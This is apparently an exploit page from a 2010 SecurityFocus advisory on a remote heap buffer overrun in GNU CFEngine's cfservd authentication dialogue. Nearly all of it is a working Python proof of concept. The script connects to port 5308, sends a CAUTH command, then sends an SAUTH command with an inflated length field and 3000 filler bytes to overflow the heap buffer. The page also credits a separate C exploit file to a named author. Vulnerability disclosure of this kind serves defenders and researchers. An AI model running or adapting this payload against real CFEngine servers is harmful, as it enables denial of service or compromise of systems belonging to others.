GNU CFEngine AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability

An exploit was developed by the discoverers of this vulnerability. This exploit is not believed to be public. The following proof of concept is available:

import struct
import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.1', 5308))  # target cfservd address from the PoC; 5308 is the cfengine server port

# CAUTH command
p = 'k' # status
p += '0000023' # len
p += 'CAUTH ' # command
p += 'HARE KRISHNA HARE'
print 'sending CAUTH command...'
s.send(p)
# SAUTH command
p = 'k' # status
p += '0003000' # len
p += 'SAUTH ' # command
p += 'n' # iscrypt
p += '00000010 ' # crypt_len
p += '00001000' # nonce_len
p += 'X' * 3000
print 'sending SAUTH command...'
s.send(p)

a = s.recv(4096)
print a

Exploit code cfengine_hof.c has been supplied by jsk exworm <exworm.hostrocket.com>.

Copyright 2010, SecurityFocus